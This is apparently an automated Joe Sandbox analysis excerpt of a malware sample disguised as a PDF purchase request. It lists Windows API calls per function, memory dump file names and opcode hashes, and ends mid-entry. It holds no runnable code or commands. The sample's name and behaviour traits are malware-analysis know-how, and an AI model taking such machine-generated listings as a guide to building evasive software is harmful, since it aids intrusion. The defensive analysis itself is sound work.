                                                                                                                APIs
                                                                                                                • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00AC1DC0
                                                                                                                • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00AC1DE1
                                                                                                                • WSAGetLastError.WSOCK32 ref: 00AC1DF2
                                                                                                                • htons.WSOCK32(?,?,?,?,?), ref: 00AC1EDB
                                                                                                                • inet_ntoa.WSOCK32(?), ref: 00AC1E8C
                                                                                                                  • Part of subcall function 00AA39E8: _strlen.LIBCMT ref: 00AA39F2
                                                                                                                  • Part of subcall function 00AC3224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00ABEC0C), ref: 00AC3240
                                                                                                                • _strlen.LIBCMT ref: 00AC1F35
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                • String ID:
                                                                                                                • API String ID: 3203458085-0
                                                                                                                • Opcode ID: 1ae834a508e69da87b12bf485f50cb977f392f25e52ff13b4ea570ce63589b4d
                                                                                                                • Instruction ID: 41b8aa911dac3e6d6e20e8ab2a1ae1c8cd9941f39314fd9a5790c9046e2db644
                                                                                                                • Opcode Fuzzy Hash: 1ae834a508e69da87b12bf485f50cb977f392f25e52ff13b4ea570ce63589b4d
                                                                                                                • Instruction Fuzzy Hash: A3B1DC35204300AFC324DF24C895F2ABBE5AF86318F55894DF45A5B2A3DB31ED46CB92
                                                                                                                Function 00A45D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetClientRect.USER32(?,?), ref: 00A45D30
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00A45D71
                                                                                                                • ScreenToClient.USER32(?,?), ref: 00A45D99
                                                                                                                • GetClientRect.USER32(?,?), ref: 00A45ED7
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00A45EF8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$Client$Window$Screen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1296646539-0
                                                                                                                • Opcode ID: 1bdc27ac7f4ed970770da471f94f06a2d5ed619e421f51e37047a1020c1fe0cf
                                                                                                                • Instruction ID: 3b69144c3f93a6011e0061cbb5279a1a249658ea832787ab24ad04e832834601
                                                                                                                • Opcode Fuzzy Hash: 1bdc27ac7f4ed970770da471f94f06a2d5ed619e421f51e37047a1020c1fe0cf
                                                                                                                • Instruction Fuzzy Hash: 84B16838A00B4ADBDB10DFB9C4817EAB7F1FF48310F14941AE8AAD7250DB34AA51DB54
                                                                                                                Function 00A701B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __allrem.LIBCMT ref: 00A700BA
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A700D6
                                                                                                                • __allrem.LIBCMT ref: 00A700ED
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A7010B
                                                                                                                • __allrem.LIBCMT ref: 00A70122
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A70140
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                • String ID:
                                                                                                                • API String ID: 1992179935-0
                                                                                                                • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                                                                • Instruction ID: 68591aafd670c2cf201517ae3baba54d789cc5643450560d6d29451453dac757
                                                                                                                • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                                                                                • Instruction Fuzzy Hash: 2081F472A00706DFE724AF28DD51B6B73B9EF41324F24C23AF519D6681EB70D9018B50
                                                                                                                Function 00A761FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00A682D9,00A682D9,?,?,?,00A7644F,00000001,00000001,8BE85006), ref: 00A76258
                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00A7644F,00000001,00000001,8BE85006,?,?,?), ref: 00A762DE
                                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00A763D8
                                                                                                                • __freea.LIBCMT ref: 00A763E5
                                                                                                                  • Part of subcall function 00A73820: RtlAllocateHeap.NTDLL(00000000,?,00B11444,?,00A5FDF5,?,?,00A4A976,00000010,00B11440,00A413FC,?,00A413C6,?,00A41129), ref: 00A73852
                                                                                                                • __freea.LIBCMT ref: 00A763EE
                                                                                                                • __freea.LIBCMT ref: 00A76413
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1414292761-0
                                                                                                                • Opcode ID: 1a465e844810105a64cc268c2db551d8231a7186bef9a35407841ffb4391dfae
                                                                                                                • Instruction ID: 81d0dec89848114c154f7e7d2e0dbcb9c9b115f94b58393cce5321afbd83b06e
                                                                                                                • Opcode Fuzzy Hash: 1a465e844810105a64cc268c2db551d8231a7186bef9a35407841ffb4391dfae
                                                                                                                • Instruction Fuzzy Hash: 4451B072A00A16ABEF258F64CD81FAF7BA9EB44750F15C629FC09DA141EB34DC44D7A0
                                                                                                                Function 00ACBBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A49CB3: _wcslen.LIBCMT ref: 00A49CBD
                                                                                                                  • Part of subcall function 00ACC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00ACB6AE,?,?), ref: 00ACC9B5
                                                                                                                  • Part of subcall function 00ACC998: _wcslen.LIBCMT ref: 00ACC9F1
                                                                                                                  • Part of subcall function 00ACC998: _wcslen.LIBCMT ref: 00ACCA68
                                                                                                                  • Part of subcall function 00ACC998: _wcslen.LIBCMT ref: 00ACCA9E
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00ACBCCA
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00ACBD25
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00ACBD6A
                                                                                                                • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00ACBD99
                                                                                                                • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00ACBDF3
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00ACBDFF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 1120388591-0
                                                                                                                • Opcode ID: e303bc86d36fa5c3b5adad9635ce3351e665e68f9937077cb7d3a7f66849bbf9
                                                                                                                • Instruction ID: 64d52c2df8dc0221b63c8112fefd38a05542616f3517fa5fd0a66c6fad8214e5
                                                                                                                • Opcode Fuzzy Hash: e303bc86d36fa5c3b5adad9635ce3351e665e68f9937077cb7d3a7f66849bbf9
                                                                                                                • Instruction Fuzzy Hash: 6881A230118241EFD714DF24C986E2ABBE5FF84308F15495DF45A4B2A2DB32ED45CBA2
                                                                                                                Function 00A9F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(00000035), ref: 00A9F7B9
                                                                                                                • SysAllocString.OLEAUT32(00000001), ref: 00A9F860
                                                                                                                • VariantCopy.OLEAUT32(00A9FA64,00000000), ref: 00A9F889
                                                                                                                • VariantClear.OLEAUT32(00A9FA64), ref: 00A9F8AD
                                                                                                                • VariantCopy.OLEAUT32(00A9FA64,00000000), ref: 00A9F8B1
                                                                                                                • VariantClear.OLEAUT32(?), ref: 00A9F8BB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                • String ID:
                                                                                                                • API String ID: 3859894641-0
                                                                                                                • Opcode ID: e79b2f8d4ef2e69496d9f0145789a3f738315f878be06858e2db96ba1efd216a
                                                                                                                • Instruction ID: b8ac951afa28c344baa64c69a3bebe9e06e9aeb33c293966ae53342b2d92a1ca
                                                                                                                • Opcode Fuzzy Hash: e79b2f8d4ef2e69496d9f0145789a3f738315f878be06858e2db96ba1efd216a
                                                                                                                • Instruction Fuzzy Hash: 8751BE35700310BECF24AB65D995B69B3E8EF45320B24946BE906DF296DB70CC40CBA6
                                                                                                                Function 00AB910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A47620: _wcslen.LIBCMT ref: 00A47625
                                                                                                                  • Part of subcall function 00A46B57: _wcslen.LIBCMT ref: 00A46B6A
                                                                                                                • GetOpenFileNameW.COMDLG32(00000058), ref: 00AB94E5
                                                                                                                • _wcslen.LIBCMT ref: 00AB9506
                                                                                                                • _wcslen.LIBCMT ref: 00AB952D
                                                                                                                • GetSaveFileNameW.COMDLG32(00000058), ref: 00AB9585
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcslen$FileName$OpenSave
                                                                                                                • String ID: X
                                                                                                                • API String ID: 83654149-3081909835
                                                                                                                • Opcode ID: 6f0b34e1f45540c4ac2278d97357e72a72d871f8e19476c8566336440163af4a
                                                                                                                • Instruction ID: 2d1d4a0686e5a747a015a8ec03e0c2110bfec20a614b9176e20ea96181155627
                                                                                                                • Opcode Fuzzy Hash: 6f0b34e1f45540c4ac2278d97357e72a72d871f8e19476c8566336440163af4a
                                                                                                                • Instruction Fuzzy Hash: FBE1BF359083409FD724DF24C981AABB7E4FF85314F04896DF9899B2A2DB31ED05CB92
                                                                                                                Function 00A5920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A59BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A59BB2
                                                                                                                • BeginPaint.USER32(?,?,?), ref: 00A59241
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00A592A5
                                                                                                                • ScreenToClient.USER32(?,?), ref: 00A592C2
                                                                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00A592D3
                                                                                                                • EndPaint.USER32(?,?,?,?,?), ref: 00A59321
                                                                                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00A971EA
                                                                                                                  • Part of subcall function 00A59339: BeginPath.GDI32(00000000), ref: 00A59357
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                • String ID:
                                                                                                                • API String ID: 3050599898-0
                                                                                                                • Opcode ID: c0fa4dc1c75b6da7d8ad4fea7e65707ffc8ebe6d16eccdc26ff5aabb5e573006
                                                                                                                • Instruction ID: c5816bc484526e52e3ad4ccec25cf0f6b92724eccc4ab805936204e4336c45db
                                                                                                                • Opcode Fuzzy Hash: c0fa4dc1c75b6da7d8ad4fea7e65707ffc8ebe6d16eccdc26ff5aabb5e573006
                                                                                                                • Instruction Fuzzy Hash: 4141BE30205201EFDB10DF68C884FAB7BF8FB55361F140629FA658B2A1C730984ADB61
                                                                                                                Function 00AB07EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 00AB080C
                                                                                                                • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00AB0847
                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 00AB0863
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00AB08DC
                                                                                                                • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00AB08F3
                                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00AB0921
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                • String ID:
                                                                                                                • API String ID: 3368777196-0
                                                                                                                • Opcode ID: 6c9fd3fac588172efbadd2ffb7e10f55388315239bf538ef9b52bc09c58e8b1d
                                                                                                                • Instruction ID: 40e4f5c7e70da78f20a9f6b869116d650850d0c1f1e1fd998a6b5f8196d29b06
                                                                                                                • Opcode Fuzzy Hash: 6c9fd3fac588172efbadd2ffb7e10f55388315239bf538ef9b52bc09c58e8b1d
                                                                                                                • Instruction Fuzzy Hash: F0416771900205EFDF14EF94DC85AAAB7B8FF04310F1440A9ED00AA297DB30DE65DBA0
                                                                                                                Function 00AD81DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00A9F3AB,00000000,?,?,00000000,?,00A9682C,00000004,00000000,00000000), ref: 00AD824C
                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 00AD8272
                                                                                                                • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00AD82D1
                                                                                                                • ShowWindow.USER32(00000000,00000004), ref: 00AD82E5
                                                                                                                • EnableWindow.USER32(00000000,00000001), ref: 00AD830B
                                                                                                                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00AD832F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Show$Enable$MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 642888154-0
                                                                                                                • Opcode ID: 563696d365316630c0d95af8fb8dd63da55d22d06e90830e9ba45692027b51fc
                                                                                                                • Instruction ID: ec2efd6a7a5a566a2eda2774cd6e07d77ab3eebb737c1cbcd4188f6198772ee8
                                                                                                                • Opcode Fuzzy Hash: 563696d365316630c0d95af8fb8dd63da55d22d06e90830e9ba45692027b51fc
                                                                                                                • Instruction Fuzzy Hash: 2541B834601644AFDB11CF25CC95BE47BF0FB4A715F5842AAE62A4F372CB35A842CB50
                                                                                                                Function 00AA4C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • IsWindowVisible.USER32(?), ref: 00AA4C95
                                                                                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00AA4CB2
                                                                                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00AA4CEA
                                                                                                                • _wcslen.LIBCMT ref: 00AA4D08
                                                                                                                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00AA4D10
                                                                                                                • _wcsstr.LIBVCRUNTIME ref: 00AA4D1A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                • String ID:
                                                                                                                • API String ID: 72514467-0
                                                                                                                • Opcode ID: ceda879335234ba28d26d4832a157f8db036a103336e8c3645224f45453f8dab
                                                                                                                • Instruction ID: 124f84c10f71cd37bc7044eec11235796c507121051bcf4fb981107fd4067182
                                                                                                                • Opcode Fuzzy Hash: ceda879335234ba28d26d4832a157f8db036a103336e8c3645224f45453f8dab
                                                                                                                • Instruction Fuzzy Hash: EB21D7326052017BEB159B79DD4AE7B7BACDF8A760F10802AF809CB1D1DBB5DC01D6A0
                                                                                                                Function 00AB581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A43AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A43A97,?,?,00A42E7F,?,?,?,00000000), ref: 00A43AC2
                                                                                                                • _wcslen.LIBCMT ref: 00AB587B
                                                                                                                • CoInitialize.OLE32(00000000), ref: 00AB5995
                                                                                                                • CoCreateInstance.OLE32(00ADFCF8,00000000,00000001,00ADFB68,?), ref: 00AB59AE
                                                                                                                • CoUninitialize.OLE32 ref: 00AB59CC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                • String ID: .lnk
                                                                                                                • API String ID: 3172280962-24824748
                                                                                                                • Opcode ID: 72295a12d81b42c31d97aea9476bcb7e3c3aa913c84426939230f44bda75648d
                                                                                                                • Instruction ID: b83e59f44836f988710ab0b4e33d3f24a5a5d3824979a127c30b8e306fddbaff
                                                                                                                • Opcode Fuzzy Hash: 72295a12d81b42c31d97aea9476bcb7e3c3aa913c84426939230f44bda75648d
                                                                                                                • Instruction Fuzzy Hash: 34D14275A087019FC714DF24C584A6ABBE9FF89710F14885DF88A9B362DB31EC45CB92
                                                                                                                Function 00AA175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00AA0FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00AA0FCA
